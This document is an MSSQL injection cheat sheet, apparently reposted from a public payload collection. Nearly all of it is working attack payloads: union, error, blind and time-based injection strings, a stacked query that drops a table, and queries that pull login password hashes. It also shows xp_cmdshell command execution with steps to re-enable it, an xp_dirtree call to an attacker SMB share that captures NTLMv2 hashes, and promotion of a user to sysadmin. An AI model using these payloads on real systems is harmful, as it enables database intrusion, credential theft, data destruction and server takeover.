MSSQL Injection
Summary
- MSSQL comments
- MSSQL version
- MSSQL database name
- MSSQL List databases
- MSSQL List columns
- MSSQL List tables
- MSSQL Extract user/password
- MSSQL Union Based
- MSSQL Error Based
- MSSQL Blind Based
- MSSQL Time Based
- MSSQL Stacked query
- MSSQL Command execution
- MSSQL UNC path
- MSSQL Make user DBA
MSSQL comments
-- comment goes here/* comment goes here */
MSSQL version
SELECT @@version
MSSQL database name
SELECT DB_NAME()
MSSQL List databases
SELECT name FROM master..sysdatabases;SELECT DB_NAME(N); — for N = 0, 1, 2, …
MSSQL List columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB onlySELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometableSELECT table_catalog, column_name FROM information_schema.columns
MSSQL List tables
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for viewsSELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometableSELECT table_catalog, table_name FROM information_schema.columns
MSSQL Extract user/password
MSSQL 2000:SELECT name, password FROM master..sysxloginsSELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)MSSQL 2005SELECT name, password_hash FROM master.sys.sql_loginsSELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
MSSQL Union Based
-- extract databases names$ SELECT name FROM master..sysdatabases[*] Injection[*] msdb[*] tempdb-- extract tables from Injection database$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'[*] Profiles[*] Roles[*] Users-- extract columns for the table Users$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')[*] UserId[*] UserName-- Finally extract the data$ SELECT UserId, UserName from Users
MSSQL Error based
For integer inputs : convert(int,@@version)For integer inputs : cast((SELECT @@version) as int)For string inputs : ' + convert(int,@@version) + 'For string inputs : ' + cast((SELECT @@version) as int) + '
MSSQL Blind based
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)SELECT message FROM data WHERE row = 1 and message like 't%'
MSSQL Time based
ProductID=1;waitfor delay '0:0:10'--ProductID=1);waitfor delay '0:0:10'--ProductID=1';waitfor delay '0:0:10'--ProductID=1');waitfor delay '0:0:10'--ProductID=1));waitfor delay '0:0:10'--IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
MSSQL Stacked Query
Use a semi-colon “;” to add another query
ProductID=1; DROP members--
MSSQL Command execution
EXEC xp_cmdshell "net user";EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
To interact with the MSSQL instance.
sqsh -S 192.168.1.X -U sa -P superPasswordpython mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
MSSQL UNC Path
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the xp_dirtree function to list the files in our SMB share and grab the NTLMv2 hash.
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
MSSQL Make user DBA (DB admin)
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
References
若有收获,就点个赞吧
0 人点赞
